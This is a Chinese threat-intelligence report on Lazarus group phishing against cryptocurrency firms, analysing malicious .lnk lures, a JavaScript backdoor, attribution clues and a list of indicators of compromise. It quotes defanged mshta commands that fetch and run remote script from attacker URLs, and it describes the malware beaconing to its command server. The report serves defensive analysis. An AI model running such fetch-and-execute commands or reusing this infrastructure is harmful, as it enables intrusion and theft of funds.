Lazarus组织对加密货币行业持续发起攻击 – 作者:安恒威胁情报中心

概述

Lazarus组织

被认为是来自朝鲜的APT组织，攻击目标遍布全球，最早的活动时间可以追溯至2007年，其主要目标包括国防、政府、金融、能源等，早期主要以窃取情报为目的，自2014年后进行业务扩张，攻击目标拓展到金融机构、虚拟货币交易所等具有较高经济价值的对象。资料显示，2014 年索尼影业遭黑客攻击事件、2016 年孟加拉国银行数据泄露事件、2017年美国国防承包商和能源部门、同年英韩等国比特币交易所攻击事件以及今年针对众多国家国防和航空航天公司的攻击等事件皆被认为与此组织有关。

该组织对近几年对金融机构、加密货币交易机构攻击非常频繁，尤其是加密货币业务，由于虚拟货币和加密货币难以追踪的特殊性，使其较传统金融业务更加容易受到攻击，Lazarus组织更是乐此不疲，大肆敛财。其攻击对象大多为交易所相关从业人员，也涉及数字货币用户，辐射全球，中、日、韩等国的数字货币交易机构成重灾区。

近期的攻击活动中就包括AppleJeus攻击行动目标大多与加密货币实体相关，今年8月，该组织通过LinkedIn招聘广告诱饵攻击加密货币公司。9月，Lazarus组织洗钱方法被曝光，资料表示其通常会从交易所窃取加密货币资金，然后开始使用称为“分层技术”的东西通过不同的多个交易所进行交易，并雇佣协助者，获取分发资金帮助洗钱，使加密货币能够在众多地址之间转移，以混淆资金来源，并可以通过一定手法转成法定货币或其他形式。

近期，安恒威胁情报中心猎影实验室捕获到一些加密货币协会公告、区块链项目风险审查为诱饵内容的恶意lnk文件。经过对攻击样本的分析与溯源，我们认为这批样本来自于半岛地区的APT组织Lazarus。

样本分析

如分析的文件为最新捕获到的lnk文件，文件名为“新しい業務指針（2020年11月）.docx.lnk”，意为新业务准则（2020年11月）。

样本打开后会执行

mshta.exe https://bit[.]ly/34Nauvg命令，bitly短链最终访问的地址为：

http://up.myemail[.]works/+Eu8cueEnRsCcDRm5c00R2Fkg36MNK0wToJtR7rPNrM=，

目前此链接已失效。

访问链接下载后续的JavaScript脚本文件（md5：9d555c1093ff84ac3d442b1a0617f7ef）

这里变量c由base64编码，解码后为谷歌在线文档链接

（https://drive.google[.]com/file/d/1j9H9T5QSQYayAJLvQJcGf_FI_7QHQiq_/view），脚本访问此链接获取伪装文档内容，文档内容语言为日语，内容为两份公告，与加密资产相关。

公告的内容来源为日本加密货币交易协会网站：

并通过wmi接口遍历当前系统进程：

检测“kwsprot”进程（金山毒霸）与“npprot”进程（NPAV），若存在使用cscript执行后续的脚本，否则使用wscript。这一过程与此前Lazarus对加密货币行业攻击中所使用的脚本一致。

脚本内嵌了base64编码的payload，解码后得到最后的脚本如下（md5：fb1c6e467956ec29c098bb18474a2ef6），

生成用于标识受害机的ID，发送至C2服务器后每15秒检查一次C2服务器发送的后续payload。

关联分析

我们在捕获到的docx文档的settings.xml文件内，发现了语言值w:eastAsia=”ko-KR”，攻击者过往的投放docx文件进行相关分析也发现存在同样的语言值，由此可以推测攻击者可能存在韩语语言背景。

“新しい業務指針（2020年11月）.docx.lnk”样本中出现用户名字符串“desktop-ppppppp”，我们关联到样本“奖金计划（2020年8月).docx.lnk”（md5：12aa32ee18926c597f3c0387f0775577）

关联样本为Lazarus在8月份的攻击文件，除了使用同样的用户名字符串外，两次攻击的TTP也几乎一致。

国外安全厂商F-Secure在今年8月份的一份报告中详细分析了Javascript后门后续下载的二进制木马，该木马与Lazarus的特马存在较高的代码相似度，并将此系列攻击归属于半岛地区APT组织Lazarus。

我们从攻击者过往攻击中所投放的所有文档中提取出文档的上次打印时间、首次创建时间、最近保存时间信息，得到下图。可以看出，攻击者对于文档的操作时间段分布于UTC时间0点至16点。从工作时间角度来看，与之前所推测的朝鲜半岛地区时间吻合。

我们在溯源的拓线分析中发现了一可执行文件样本

（md5：f316f341f923c1598dbbb6967c1c66e2）

文件有着很好的免杀效果，图标伪装成PDF。创建时间与提交时间间隔较短，加之文件提交时的命名方式，推测该样本为测试样本。

该可执行文件启动后会打开浏览器访问

https://drive.google[.]com/file/d/12q1i4uCkY_WTx0VDQwgchhnvwD-IHb07/view

以迷惑受害者。

样本会执行mshta.exe https://bit[.]ly/34Q1sxr命令，短链接最终访问：

http://up.myemail[.]works/GezS0o/6TTK2UgdXOGTL/3DEjZdI1vbd82geO0qK6Qg=

后续的攻击手段与前文类似，不作赘述。

此次捕获的样本的关联分析中发现的相关网络资产，如其中使用域名资产还包括：

myemail[.]works

anicloud[.]ru

cloud-sheet[.]net

sharesvr[.]net

filehost[.]network

msftoffice[.]com

近期攻击的其他关联样本也大多以区块链、加密货币为主题，如相关诱饵主题如下：

总结

Lazarus至少自2017年以来就持续将加密货币行业的机构和公司作为自己的攻击目标，，从TTP上来看有着较高的延续性，而在钓鱼载体的选取上较为多变：

早期使用的文件大多为钓鱼文档，内容选取上也以诱导受害者启用宏为目标，受害者启用宏后通过执行恶意的vbs脚本下载后续后门木马。

至少自2018年6月开始，使用的钓鱼文件中出现了lnk文件，相关样本利用mshta执行远程脚本，所使用的脚本在与宏指令脚本结构上有较高相似度。在2019年以后出现了攻击者投放包含加密文档与伪装成文档密码记事本文件的lnk文件的钓鱼方式，以此诱导受害者点击。

在近期发现的样本中，攻击者将部分docx文件嵌入lnk文件内。不过在攻击的执行过程中，诱饵文档仍然是通过浏览器访问google drive网盘服务链接打开的。同时也有着前文提及的可执行文件样本出现，可以看出攻击者正尝试更新钓鱼的手段。

IOC

#Hash：

a2117f2058043ef757af6e5d45afa491

a164164ef82fa17605c49c36c67a6244

14a00f517012279af53118a491253e5c

224d2398437e665f3202d4118e4748e2

a2bfa52ac21ab618fb7f8af1261b6428

f316f341f923c1598dbbb6967c1c66e2

0efc5c754b6739be19d5478fdffde7f5

c1f725abaf4e82ff1a4042f84d226643

4da5e7d083af1ba3872c205ff27de8cc

9d555c1093ff84ac3d442b1a0617f7ef

#Domain：

myemail[.]works

anicloud[.]ru

cloud-sheet[.]net

sharesvr[.]net

filehost[.]network

msftoffice[.]com

#IP：

84.201.189[.]216
89.134.49[.]3

来源：freebuf.com 2020-11-27 17:02:23 by: 安恒威胁情报中心